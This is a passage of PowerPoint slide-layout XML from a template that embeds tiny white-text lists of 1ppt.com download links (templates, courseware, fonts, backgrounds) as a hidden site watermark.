              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout277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77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77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77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7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78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78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78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78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78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78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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout278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78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78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78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7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79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79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79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79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79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79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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout279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79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79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79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8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80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80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80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80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80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80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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
